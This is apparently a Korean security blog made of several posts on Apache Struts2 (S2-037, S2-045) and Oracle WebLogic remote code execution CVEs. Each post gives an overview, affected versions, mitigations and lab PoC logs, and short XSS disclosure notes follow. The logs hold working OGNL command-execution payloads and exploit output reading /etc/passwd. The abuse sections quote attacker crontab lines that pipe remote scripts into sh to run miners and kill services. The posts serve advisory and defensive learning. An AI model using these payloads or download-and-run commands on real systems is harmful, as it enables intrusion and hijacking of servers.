Apache Struts2 취약점 CVE-2016-4438 (S2-037) 개요 및 실습



 

1. 개요

- REST Plugin 사용 시 원격 공격자가 제작된 표현식을 통해 임의의 코드 실행 가능



2. 영향받는 버전

- Apache Struts 2.3.20 ~ 2.3.28.1 (REST Plugin 사용 시 발생)



3. 릴리즈 일자

2016/05/02



4. 대응방안

- Apache Struts 버전 2.3.29로 업그레이드

- Apache Struts 2.3.29로 업그레이드 시 OGNL 표현식의 호환성 문제 발생 가능함



5. 참고자료

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4438

https://nvd.nist.gov/vuln/detail/CVE-2016-4438

https://cwiki.apache.org/confluence/display/WW/S2-037



6. POC(Proof Of Concept)

 

1) Victim 환경

- Windows 10 Pro

- Java 1.7.8_80

- Apache Tomcat 7.0.54

- Apache Struts 2.3.28



2) Attacker 환경

- CentOS 6 x64



3) 취약점 Scanning



4) 취약점 공격(exploit)



5) catalina.out log


 1 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation error

심각: Exception processing the result.

java.lang.IllegalStateException: getWriter() has already been called for this response

        at org.apache.catalina.connector.Response.getOutputStream(Response.java:602)

        at org.apache.catalina.connector.ResponseFacade.getOutputStream(ResponseFacade.java:196)

        at org.apache.struts2.rest.DefaultContentTypeHandlerManager.handleResult(DefaultContentTypeHandlerManager.java:187)

        at org.apache.struts2.rest.RestActionInvocation.executeResult(RestActionInvocation.java:232)

        at org.apache.struts2.rest.RestActionInvocation.processResult(RestActionInvocation.java:197)

        at org.apache.struts2.rest.RestActionInvocation.invoke(RestActionInvocation.java:145)

        at com.opensymphony.xwork2.DefaultActionProxy.execute(DefaultActionProxy.java:147)

        at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:567)

        at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:81)

        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:99)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)

        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)

        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)

        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)

        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)

        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)

        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)

        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)

        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)

        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)

        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)

        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)

        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)

        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

        at java.lang.Thread.run(Thread.java:745)

 

1 11, 2018 2:26:01 오후 org.apache.struts2.rest.RestActionInvocation info

정보: Executed action [/orders!(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#wr=#context[#parameters.obj[0]].getWriter(),#rs=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.command[0]).getInputStream()),#wr.println(#rs),#wr.flush(),#wr.close()):xx.toString!json!200] took 135 ms (execution: 49 ms, result: 86 ms)




저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

Oracle WebLogic Server Remote Security Vulnerability (CVE-2015-4852, CVE-2016-3510)  (0) 2018.03.19
Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01

Oracle WebLogic Server Remote Security Vulnerability

(CVE-2015-4852, CVE-2016-3510)


- Oracle WebLogic Server Java Object Deserialization RCE

- Java Unserialize vulnerability on t3 enabled backends

 


1. 개요

- WLS Security Component 사용 시 원격 공격자가 T3 프로토콜 트래픽에서 만들어진 직렬화(Serialization) Java 객체를 통해 임의의 명령을 7001/TCP로 전송하여 실행

- 사용자 입력에서 역 직렬화(Deserialization)를 직접 수행하는 경우, 공격자가 악의적인 입력을 구성하여 Deserialization가 예상치 못한 객체를 생성하여 임의의 코드 실행 가능

- oracle_common/modules/com.bea.core.apache.commons.collections.jar

- 해당 공격이 성공하면 원격 코드 실행 가능

 


2. 영향받는 버전

- WebLogic Server 10.3.6.0

- WebLogic Server 12.1.3.0

- WebLogic Server 12.2.1.0

 


3. 릴리즈 일자

CVE-2015-4852 : 2015/06/24

CVE-2016-3510 : 2016/03/17

 


4. 대응방안

 

4.1 2016 7 Oracle Critical Patch Update

http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html



5. 참고자료

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4852

https://nvd.nist.gov/vuln/detail/CVE-2015-4852

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3510

https://nvd.nist.gov/vuln/detail/CVE-2016-3510

http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html

 


6. POC(Proof Of Concept)

 

6.1 Victim 환경

- CentOS 6 x64

- Weblogic 11g : Weblogic Server 10.3.6.0

- Java : Java 1.7.0_80

 

6.2 Attacker 환경

- CentOS 6 x64

 

6.3 취약점 공격 (exploit)

 


6.4 취약점 공격 실행 결과 화면

 



6.5 Log 확인

 

####<2018. 3. 19 ▒▒▒▒ 6▒▒ 50▒▒ 14▒▒ KST> <Error> <RJVM> <XXX> <test> <ExecuteThread: '3' for queue: 'weblogic.socket.Muxer'> <<WLS Kernel>> <> <> <1514973014380> <BEA-000503> <Incoming message header or abbreviation processing failed

 java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set

java.lang.ClassCastException: java.lang.Integer cannot be cast to java.util.Set

        at com.sun.proxy.$Proxy89.entrySet(Unknown Source)

        at sun.reflect.annotation.AnnotationInvocationHandler.readObject(AnnotationInvocationHandler.java:443)

        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)

        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)

        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)

        at java.lang.reflect.Method.invoke(Method.java:606)

        at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1017)

        at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:1893)

        at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1798)

        at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1350)

        at java.io.ObjectInputStream.readObject(ObjectInputStream.java:370)

        at weblogic.rjvm.InboundMsgAbbrev.readObject(InboundMsgAbbrev.java:66)

        at weblogic.rjvm.InboundMsgAbbrev.read(InboundMsgAbbrev.java:38)

        at weblogic.rjvm.MsgAbbrevJVMConnection.readMsgAbbrevs(MsgAbbrevJVMConnection.java:283)

        at weblogic.rjvm.MsgAbbrevInputStream.init(MsgAbbrevInputStream.java:213)

        at weblogic.rjvm.MsgAbbrevJVMConnection.dispatch(MsgAbbrevJVMConnection.java:498)

        at weblogic.rjvm.t3.MuxableSocketT3.dispatch(MuxableSocketT3.java:330)

        at weblogic.socket.BaseAbstractMuxableSocket.dispatch(BaseAbstractMuxableSocket.java:387)

        at weblogic.socket.SocketMuxer.readReadySocketOnce(SocketMuxer.java:967)

        at weblogic.socket.SocketMuxer.readReadySocket(SocketMuxer.java:899)

        at weblogic.socket.PosixSocketMuxer.processSockets(PosixSocketMuxer.java:130)

        at weblogic.socket.SocketReaderRequest.run(SocketReaderRequest.java:29)

        at weblogic.socket.SocketReaderRequest.execute(SocketReaderRequest.java:42)

        at weblogic.kernel.ExecuteThread.execute(ExecuteThread.java:145)

        at weblogic.kernel.ExecuteThread.run(ExecuteThread.java:117) 




6.6 악용예제


- 해당 취약점이 존재하는 WAS 서버에 중국 해커로 추정되는 공격자에 의하여 비트 코인 채굴기 (miner) 동작 및 정상 서비스를 방해는 쉘 스크립트 동작 수행


$ ps -ef | grep wls

...

wls      17510 17506  0 18:34 ?        00:00:00 /bin/sh -c curl http://198.xxx.xxx.73/2 | sh

wls      13771       1 99 01:54 ?        1-17:17:07 /tmp/xfsallocd -B

...


$ crontab -l

*/1 * * * *  curl http://216.xxx.xxx.227/js/2 | sh

*/1 * * * *  /tmp/fs.sh


$ cat /tmp/fs.sh

#!/bin/sh

pkill -9 atd

pkill -f atd

pkill -f polkitd

pkill -f http

pkill -f httpd

...

※ 국내에서 해당 취약점은 miner를 구동하기 위하여 주로 코이너들이 활용하고 있으며, 개인정보 유출/시스템 파괴/2차 공격을 위한 흔적 삭제 등의 피해는 잘 보고되지 않고 있음




저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

[Apache Struts] Apache Struts2 취약점 CVE-2016-4438 (S2-037) 개요 및 실습  (0) 2018.03.21
Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01


Oracle WebLogic WLS Security Component Remote Code Execution

(CVE-2017-10271, CVE-2017-3506)

 



1. 개요

- Oracle WebLogic WLS 내에 원격 코드 실행 취약점 존재

- Oracle WebLogic에서 xml 디코드를 처리하는 방식의 문제점 존재

- 공격자가 조작 된 XML 페이로드를 전송하여 원격 코드 실행(RCE)을 초래할 수 있는 XML 공격으로 구성

- 해당 공격이 성공하면 원격 코드 실행 가능

 

 

2. 영향받는 버전

- WebLogic Server 10.3.6.0.0

- WebLogic Server 12.1.3.0.0

- WebLogic Server 12.2.1.1.0

- WebLogic Server 12.2.1.2.0

 

 

3. 릴리즈 일자

- CVE-2017-3506 : 2016/12/06

- CVE-2017-10271 : 2017/06/21

 

 

4. 대응방안

 

4.1 Weblogic wls-wsat component 미 사용 시 삭제

rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

 

4.2 WAF에서 URL 차단

/wls-wsat/CoordinatorPortType

/wls-wsat/CoordinatorPortType11

/wls-wsat/ParticipantPortType

/wls-wsat/ParticipantPortType11

/wls-wsat/RegistrationPortTypeRPC

/wls-wsat/RegistrationPortTypeRPC11

/wls-wsat/RegistrationRequesterPortType

/wls-wsat/RegistrationRequesterPortType11

 

 

4.3 2017 10 Oracle Critical Patch Update

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

 

 

5. 참고자료

- CVE-2017-3506 :   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506

- CVE-2017-10271 :   http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

- Oracle Critical Patch Update Advisory - April 2017 :   http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html

- Oracle Critical Patch Update Advisory - October 2017 :   http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

- https://www.ren-isac.net/public-resources/alerts/REN-ISAC_ADVISORY_Oracle_WebLogic_Vulnerability_Bitcoin_Miner_Attacks_20180105v1.pdf

 


6. POC(Proof Of Concept)


6.1 Victim 환경

- CentOS 6 x64

- Weblogic 11g : WebLogic Server 10.3.6.0

- Java : jdk1.7.0_80



6.2 Attacker 환경

- CentOS 6 x64



6.3 취약점 scanning


[root@localhost weblogic]# ./exploit_scan.py http://192.168.0.100:7001/

[*] Scanning http://192.168.0.100:7001/

<h1>Web Services</h1>

[*] Potential Vuln: http://192.168.0.100:7001/ 




6.4 취약점 공격 (exploit)


[root@localhost weblogic]# ./exploit.py http://192.168.0.100:7001/


Eneter your command here: cp /etc/passwd /tmp/passwd

Command Executed




6.5 취약점 공격 실행 결과 확인


[wls@localhost root]$ cd /tmp

[wls@localhost tmp]$ ls -al passwd

-rw-r----- 1 wls wls 4156  1▒▒  4 14:19 passwd

[wls@localhost tmp]$ cat passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

...



6.6 Log 확인


 - scanning과 exploit에 대한 weblogic에서 어떠한 로그도 발견되지 않음

 - 서버의 장애 상황이나 비트코인 miner 와 같은 공격자의 흔적이 없으면 발견하기 어려움



6.7 악용예제


- 해당 취약점이 존재하는 WAS 서버에 중국 해커로 추정되는 공격자에 의하여 비트 코인 채굴기 (miner) 동작 및 정상 서비스를 방해는 쉘 스크립트 동작 수행


$ ps -ef | grep wls

...

wls      17510 17506  0 18:34 ?        00:00:00 /bin/sh -c curl http://198.xxx.xxx.73/2 | sh

wls      13771       1 99 01:54 ?        1-17:17:07 /tmp/xfsallocd -B

...


$ crontab -l

*/1 * * * *  curl http://216.xxx.xxx.227/js/2 | sh

*/1 * * * *  /tmp/fs.sh


$ cat /tmp/fs.sh

#!/bin/sh

pkill -9 atd

pkill -f atd

pkill -f polkitd

pkill -f http

pkill -f httpd

...

※ 국내에서 해당 취약점은 miner를 구동하기 위하여 주로 코이너들이 활용하고 있으며, 개인정보 유출/시스템 파괴/2차 공격을 위한 흔적 삭제 등의 피해는 잘 보고되지 않고 있음



저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

[Apache Struts] Apache Struts2 취약점 CVE-2016-4438 (S2-037) 개요 및 실습  (0) 2018.03.21
Oracle WebLogic Server Remote Security Vulnerability (CVE-2015-4852, CVE-2016-3510)  (0) 2018.03.19
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01

최초 작성일 : 2017/4/2


Apache Struts2 취약점 CVE-2017-5638 (S2-045)


1. 개요

- 파일 업로드 시도 중 Jakarta Multipart 파서의 잘못된 예외 처리 및 오류 메시지 생성 기능을 악용하여 원격 코드 실행

- 공격자가 Content-Type, Content-Disposition 또는 Content-Length HTTP 헤더를 통해 임의의 명령을 실행 가능

- 2017년 3월 #cmd = String이 포함 된 Content-Type 헤더로 악용되었음을 발견함



2. 영향 받는 버전

- Apache Struts 2.3.5 ~ 2.3.31

- Apache Struts 2.5 ~ 2.5.10



3. 릴리즈 일자

- 2017/01/29 



4. 대응 방안

- Jakarta 기반 파일 업로드 Multipart 파서를 사용하는 경우 Apache Struts 버전 2.3.32 또는 2.5.10.1로 업그레이드
- Content-Type에 엄격한 필터링 적용 및 OGNL 표현식과 사용 금지
- commons-fileupload-x.x.x.jar 파일 삭제 (해당 파일 삭제 시 업로드 기능 사용 불가)



5. 참고자료

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638

https://cwiki.apache.org/confluence/display/WW/S2-045

http://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=25264



6. POC (Proof Of Concept)


1) Victim 환경

- Windows 10 Pro

- Java 1.7.8_80

- Apache Tomcat 7.0.54


2) Attacker 환경

- CentOS 6 x64


3) 취약점 Scanning


4) 취약점 공격(exploit)


5) catalina.out log


 1 11, 2018 2:48:53 오후 org.apache.struts2.dispatcher.Dispatcher info

정보: Unable to find 'struts.multipart.saveDir' property setting. Defaulting to javax.servlet.context.tempdir

1 11, 2018 2:48:53 오후 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn

경고: Unable to parse request

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('wylvrmq','wylvrmq')}.multipart/form-data

        at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947)

        at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310)

        at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:188)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92)

        at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:84)

        at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:841)

        at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:138)

        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)

        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)

        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)

        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)

        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)

        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)

        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)

        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)

        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)

        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)

        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)

        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)

        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)

        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

        at java.lang.Thread.run(Thread.java:745)

 

1 11, 2018 2:48:54 오후 org.apache.struts2.rest.RestActionInvocation info

정보: Executed action [/!index!xhtml!200] took 21 ms (execution: 7 ms, result: 14 ms)


 1 11, 2018 2:53:08 오후 org.apache.struts2.dispatcher.Dispatcher info

정보: Unable to find 'struts.multipart.saveDir' property setting. Defaulting to javax.servlet.context.tempdir

1 11, 2018 2:53:08 오후 org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest warn

경고: Unable to parse request

org.apache.commons.fileupload.FileUploadBase$InvalidContentTypeException: the request doesn't contain a multipart/form-data or multipart/mixed stream, content type header is %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

        at org.apache.commons.fileupload.FileUploadBase$FileItemIteratorImpl.<init>(FileUploadBase.java:947)

        at org.apache.commons.fileupload.FileUploadBase.getItemIterator(FileUploadBase.java:310)

        at org.apache.commons.fileupload.FileUploadBase.parseRequest(FileUploadBase.java:334)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parseRequest(JakartaMultiPartRequest.java:188)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:127)

        at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:92)

        at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.<init>(MultiPartRequestWrapper.java:84)

        at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:841)

        at org.apache.struts2.dispatcher.ng.PrepareOperations.wrapRequest(PrepareOperations.java:138)

        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)

        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)

        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)

        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)

        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)

        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)

        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)

        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)

        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)

        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)

        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)

        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)

        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)

        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

        at java.lang.Thread.run(Thread.java:745)

 

1 11, 2018 2:53:08 오후 org.apache.struts2.rest.RestActionInvocation error

심각: Exception processing the result.

java.lang.IllegalStateException: getOutputStream() has already been called for this response

        at org.apache.catalina.connector.Response.getWriter(Response.java:636)

        at org.apache.catalina.connector.ResponseFacade.getWriter(ResponseFacade.java:213)

        at org.apache.struts2.dispatcher.ServletRedirectResult.sendRedirect(ServletRedirectResult.java:261)

        at org.apache.struts2.dispatcher.ServletRedirectResult.doExecute(ServletRedirectResult.java:229)

        at org.apache.struts2.dispatcher.StrutsResultSupport.execute(StrutsResultSupport.java:191)

        at org.apache.struts2.dispatcher.ServletRedirectResult.execute(ServletRedirectResult.java:164)

        at org.apache.struts2.dispatcher.ServletActionRedirectResult.execute(ServletActionRedirectResult.java:182)

        at org.apache.struts2.rest.RestActionInvocation.executeResult(RestActionInvocation.java:240)

        at org.apache.struts2.rest.RestActionInvocation.processResult(RestActionInvocation.java:197)

        at org.apache.struts2.rest.RestActionInvocation.invoke(RestActionInvocation.java:145)

        at com.opensymphony.xwork2.DefaultActionProxy.execute(DefaultActionProxy.java:147)

        at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:567)

        at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:81)

        at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:99)

        at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)

        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)

        at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:220)

        at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:122)

        at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:501)

        at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:171)

        at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:102)

        at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:950)

        at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)

        at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:408)

        at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1040)

        at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:607)

        at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:314)

        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1145)

        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:615)

        at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)

        at java.lang.Thread.run(Thread.java:745)

 

1 11, 2018 2:53:08 오후 org.apache.struts2.rest.RestActionInvocation info

정보: Executed action [/!index!xhtml!200] took 17 ms (execution: 6 ms, result: 11 ms)




저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

Oracle WebLogic Server Remote Security Vulnerability (CVE-2015-4852, CVE-2016-3510)  (0) 2018.03.19
Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01
[취약점 신고] N사 XSS 취약점 신고 #2  (0) 2017.04.01

최초작성일 : 2015/05/05


취약점 신고 3번째


발생 위치
N 사이트 카페

취약점 개요
XSS : 검증되지 않은 외부 입력 값에 의해 사용자 브라우저에서 악의적인 스크립트가 실행될 수 있는 취약점

취약점 종류
Reflected XSS

발생 원인
사용자 입력 값 검증 미흡

* KISA를 통해 해당 취약점을 신고하여, 현재는 취약점이 제거 되었음




저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #2  (0) 2017.04.01
[취약점 신고] N사 XSS 취약점 신고 #1  (0) 2017.04.01


최초작성일 : 2014/09/13


취약점 신고 2번째


발생 위치
N 사이트

취약점 개요
XSS : 검증되지 않은 외부 입력 값에 의해 사용자 브라우저에서 악의적인 스크립트가 실행될 수 있는 취약점

취약점 종류
Reflected XSS

발생 원인
사용자 입력 값 검증 미흡


* KISA를 통해 해당 취약점을 신고하여, 현재는 취약점이 제거 되었음



저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01
[취약점 신고] N사 XSS 취약점 신고 #1  (0) 2017.04.01

최초작성일 : 2014/08/25


발생 위치
N 사이트

취약점 개요
XSS : 검증되지 않은 외부 입력 값에 의해 사용자 브라우저에서 악의적인 스크립트가 실행될 수 있는 취약점

취약점 종류
Reflected XSS

발생 원인
사용자 입력 값 검증 미흡


* KISA를 통해 해당 취약점을 신고하여, 현재는 취약점이 제거 되었음




저작자표시 비영리 변경금지

'Vulnerability' 카테고리의 다른 글

Oracle WebLogic WLS Security Component Remote Code Execution (CVE-2017-10271, CVE-2017-3506)  (1) 2018.02.01
[Apache Struts] Apache Struts2 취약점 CVE-2017-5638(S2-045) 개요 및 실습  (0) 2018.01.17
[취약점 신고] K정보원 기능 수준의 접근통제 누락 (201505, 기관요청 비공개)  (0) 2017.05.09
[취약점 신고] N사 XSS 취약점 신고 #3  (0) 2017.04.01
[취약점 신고] N사 XSS 취약점 신고 #2  (0) 2017.04.01

+ Recent posts

티스토리툴바